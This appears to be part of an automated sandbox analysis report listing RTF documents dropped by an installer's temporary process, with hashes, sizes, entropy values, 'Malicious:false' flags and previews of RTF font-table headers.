                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 0204050305040603020
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37414
                                                                                                                                                                                                                                                          Entropy (8bit):5.037445111384111
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkGN4JS0TaGC5X2kccMG+vK5j8kES638TFeq4Tf:VkHA4Tf
                                                                                                                                                                                                                                                          MD5:EEF6FD9574018AB7519DF0FE47A51EAD
                                                                                                                                                                                                                                                          SHA1:58D45358315413816630C67BC892C7B20B986589
                                                                                                                                                                                                                                                          SHA-256:8B7C442F64A83CF255F5A9B2EC6A9152A697A4198033C1727A63F1CCCF340231
                                                                                                                                                                                                                                                          SHA-512:90D71196AFFFCFA83AC1F0DF325B18FF8871D9B45934676BD7105D8FEBF2EAF15C6AB4E0ABB93FBAE9A160F3B6197102117E527A8FDE66BA50E7A2AE0A03493C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37144
                                                                                                                                                                                                                                                          Entropy (8bit):5.0396581331661805
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkGN4JtOiBkyKWm+XnvKT0+3HEXL6LhyXWx2jUvJq4TU:VkHHR4TU
                                                                                                                                                                                                                                                          MD5:3EE19309BA4E122B381C9DFD89AC3E83
                                                                                                                                                                                                                                                          SHA1:5B5AD1A494BFE593C8A74BED71A60BAA2F47AFC2
                                                                                                                                                                                                                                                          SHA-256:2E73E1CC938915B084B13D3E93931B5FC5DB48ECBDDCB5D14B0684F919A18067
                                                                                                                                                                                                                                                          SHA-512:B9ABFE6A3327565F79F2488CA67DD18D3053DDA2C5F7A52F0521F77942B69E7133EA88687E7EAAD73F53A7D6280A92A91A269DC8CBCEBF896D2D9C044073EB58
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36715
                                                                                                                                                                                                                                                          Entropy (8bit):5.031988851778873
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:w4FkNxjETicPI0QhhiLVDfpZMHDMI4ZlZ/6A9T:w4G3UnnIA9T
                                                                                                                                                                                                                                                          MD5:3782483D6EE007A1D36CF22E4377E736
                                                                                                                                                                                                                                                          SHA1:28407BF172DD8CE139D46271AA509A64AE3C96E4
                                                                                                                                                                                                                                                          SHA-256:6E7E08A47C098030ADE2040BB9605B271619E9D57FB57BF9C2895710B64485A9
                                                                                                                                                                                                                                                          SHA-512:7AC317D52EADCF7EE5C9B1244FAA030376953ECD7227F0735D8755BDE2F6E483DA6D8D629A8D978A16EF1969D94DBFBAF6342B3BFFAA58BF61B2874959A4E2A2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):78397
                                                                                                                                                                                                                                                          Entropy (8bit):4.994922160783421
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:w4ZCmyp6N8nvBnhv+yyW6OjFwLYbJcmTaIwIA9h:wAFjmuND
                                                                                                                                                                                                                                                          MD5:52630AF15CE5E8DF4DFBAD1E2CECBDCC
                                                                                                                                                                                                                                                          SHA1:7D5A3ED6E274227C05486B222C5B348A4489B96E
                                                                                                                                                                                                                                                          SHA-256:08CBE91EB083B28FA50DBA66B6386FB3446958F27BD31B5EAD83824EE236D9D3
                                                                                                                                                                                                                                                          SHA-512:43AAB356956B2C61E72CA87EF2AB966EB9BEB23B8A414B017DC6E2061A594556D696E705A346E442B6BE21C798D2720B61515C9ABE5A8582D6F6654829909893
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37144
                                                                                                                                                                                                                                                          Entropy (8bit):5.0396581331661805
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkGN4JtOiBkyKWm+XnvKT0+3HEXL6LhyXWx2jUvJq4TU:VkHHR4TU
                                                                                                                                                                                                                                                          MD5:3EE19309BA4E122B381C9DFD89AC3E83
                                                                                                                                                                                                                                                          SHA1:5B5AD1A494BFE593C8A74BED71A60BAA2F47AFC2
                                                                                                                                                                                                                                                          SHA-256:2E73E1CC938915B084B13D3E93931B5FC5DB48ECBDDCB5D14B0684F919A18067
                                                                                                                                                                                                                                                          SHA-512:B9ABFE6A3327565F79F2488CA67DD18D3053DDA2C5F7A52F0521F77942B69E7133EA88687E7EAAD73F53A7D6280A92A91A269DC8CBCEBF896D2D9C044073EB58
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):52940
                                                                                                                                                                                                                                                          Entropy (8bit):4.975127205823685
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wqeaxjEJHT2njX8x3TLjwUtqYepAkVZEdvI9DhL8DqGJU4wEgmODwKEPrTDjwEaP:wql9hL8/44J0IA9H
                                                                                                                                                                                                                                                          MD5:3F8E8B70614BCFC77C9E8A18E5B10EBF
                                                                                                                                                                                                                                                          SHA1:1AAEB77F20B21A38684CDEDB73575D291C903060
                                                                                                                                                                                                                                                          SHA-256:F55FBEE6CA1A13B8462150E411B63B84763DA220846DF944877DB2F3C617D8AC
                                                                                                                                                                                                                                                          SHA-512:1C4262B5FB06626E41CF0CDD834F8A36007354934A07A24E4FF03BD6DBE45F4E8D52E06B4A08081E2AFEA8CCDD59E684ACF7241EC30B00AF526AB61A5F88ECAC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43096
                                                                                                                                                                                                                                                          Entropy (8bit):5.0549310472842155
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1IwSxjeXQuTJcOerjj1oKauIKx49kWYhRnFJR2qitxAC5fAw7Wcu7aoZq4TR:VkzQUS7A4TR
                                                                                                                                                                                                                                                          MD5:CFFAB85802341BBD48B8494EE847AB9A
                                                                                                                                                                                                                                                          SHA1:06FA12A2151BA01366452069E218382C32581B41
                                                                                                                                                                                                                                                          SHA-256:51C57212580E8C320617943231A7BA8D592F77544E3BF302E89A419F68EFF751
                                                                                                                                                                                                                                                          SHA-512:99C5E288398E430D0BEC05F3EE93044136DE019BF5A98962550B7D82D069441DC507BE9A22DCCEF62058AA64BF7F78D252BE579899DFF252F25F422C00113772
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \fswiss\fcharset0\fprq2 Arial CYR;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fro
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):68054
                                                                                                                                                                                                                                                          Entropy (8bit):4.9836821536158835
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wqFy4Te+UJHT2njX8x3TLjwUtqYepAkVZEdvI9vT4H1qRKPN6K2ZREhe5Vu3bXrr:wqJ6IT4HQ++PUIA9pP
                                                                                                                                                                                                                                                          MD5:A7279F7C4C7B0BCB8653144D541FAC2A
                                                                                                                                                                                                                                                          SHA1:6B24410FF99110DB0A369E7CB73E990B799555F8
                                                                                                                                                                                                                                                          SHA-256:CCFBF10B3E30471B234505F21E1929CA1388CD2959423E554A82E0EBF0946D21
                                                                                                                                                                                                                                                          SHA-512:B7C36C86657AE567FD1BF553965F2A6739698A70B82B6A3E64121D056A1941BAD8A1BA867CB1D1B1D83AA7E42B7206786BC712CAD07E517DCB3A0B80F97F26FC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Tim
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44992
                                                                                                                                                                                                                                                          Entropy (8bit):5.035044653724291
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkGN4Jt0TaGC5X2kwYp+CjcWkDxKWzHkp2Cj3DQS7RfUaMpQXtjfGKSMpoFbaq0r:VkHx/o6Ns4Tp
                                                                                                                                                                                                                                                          MD5:A4B133AED3E483AD18F78E5A993333DC
                                                                                                                                                                                                                                                          SHA1:0B90C31D5E00389329B841BC8AAE13DD5773A69B
                                                                                                                                                                                                                                                          SHA-256:CAAC008A1495175A0AE18434537C0053B46D5289F3128800D689BC7FA4F92830
                                                                                                                                                                                                                                                          SHA-512:A34192B8217C7352E3907976062BC5B3BAB5B6FDE2C9A8C885CA8DD8E48EE9A94226EBF6AE1E05371A051CF041E8C4DCB08957F257C5A349EFEF679A5059F8FF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):78397
                                                                                                                                                                                                                                                          Entropy (8bit):4.994922160783421
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:w4ZCmyp6N8nvBnhv+yyW6OjFwLYbJcmTaIwIA9h:wAFjmuND
                                                                                                                                                                                                                                                          MD5:52630AF15CE5E8DF4DFBAD1E2CECBDCC
                                                                                                                                                                                                                                                          SHA1:7D5A3ED6E274227C05486B222C5B348A4489B96E
                                                                                                                                                                                                                                                          SHA-256:08CBE91EB083B28FA50DBA66B6386FB3446958F27BD31B5EAD83824EE236D9D3
                                                                                                                                                                                                                                                          SHA-512:43AAB356956B2C61E72CA87EF2AB966EB9BEB23B8A414B017DC6E2061A594556D696E705A346E442B6BE21C798D2720B61515C9ABE5A8582D6F6654829909893
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44713
                                                                                                                                                                                                                                                          Entropy (8bit):5.051900255865599
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmqARQOjeF/RS+Lp9XhPXhnPnCLTXM40K:VklnIqxR4Td
                                                                                                                                                                                                                                                          MD5:1BD599E9D3E51995F3F39B6B680BCF5D
                                                                                                                                                                                                                                                          SHA1:E0192B60533DD734AD8B4500125A25E78A48E551
                                                                                                                                                                                                                                                          SHA-256:3894B01C5A095E0EA124AE6FE638F75990FB12D96FFD000EDAAD43D9399D5DEF
                                                                                                                                                                                                                                                          SHA-512:726F4E9BED9C4CBF56AC082A81512ED842EADC28028FD6A8895954C4E946F20681E8C6A28236674E3B1006538E10EC2F5974C4F115D74DD1928E7DC2ABA3FF07
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44178
                                                                                                                                                                                                                                                          Entropy (8bit):5.050546012194347
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk13ixj2HiBkyKWm+m2NjrOX/zJSYctuTZ4Y+2XrXZ3iE8f32HNzQf3IUBwkl2/j:VkeWY4TJ
                                                                                                                                                                                                                                                          MD5:8C6D29E2A257F91393950B5369539D50
                                                                                                                                                                                                                                                          SHA1:674B7489A1DDF7B46040AC571F3DACCEA00F0162
                                                                                                                                                                                                                                                          SHA-256:9A4326ABEFF7FEABB451943D15DC7CDD41DB433BE2A450BFF0C024E0302C6BA2
                                                                                                                                                                                                                                                          SHA-512:81E81D6E6920F9E3B5D601209CE5C79343EE95B4BED07C6788A30B8E48F337E8D73918291634E98644AA3BE96A6E171F9F610FD33EEDDB6B1D17DD9E1A25FA64
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
